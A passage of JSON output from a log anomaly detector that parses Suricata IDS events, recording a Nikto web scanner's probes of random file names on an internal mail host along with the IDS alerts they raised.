"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80", "/parser/model/time": 1583349514.305461, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46906, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.fhp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30569, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46906, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1947518544553551, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80", "/parser/model/time": 1583349514.30769, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46908, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.00RelNotes", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.307877, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2147479336955668,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.00RelNotes\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.00RelNotes", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46908, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2147479336955668,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2147479336955668, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.307877+0000\",\"flow_id\":2147479336955668,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46908,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.00RelNotes\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.00RelNotes\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80", "/parser/model/time": 1583349514.310209, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46910, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.310209 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46910 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.asp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.310454, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":281440600897230,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.asp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.asp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", 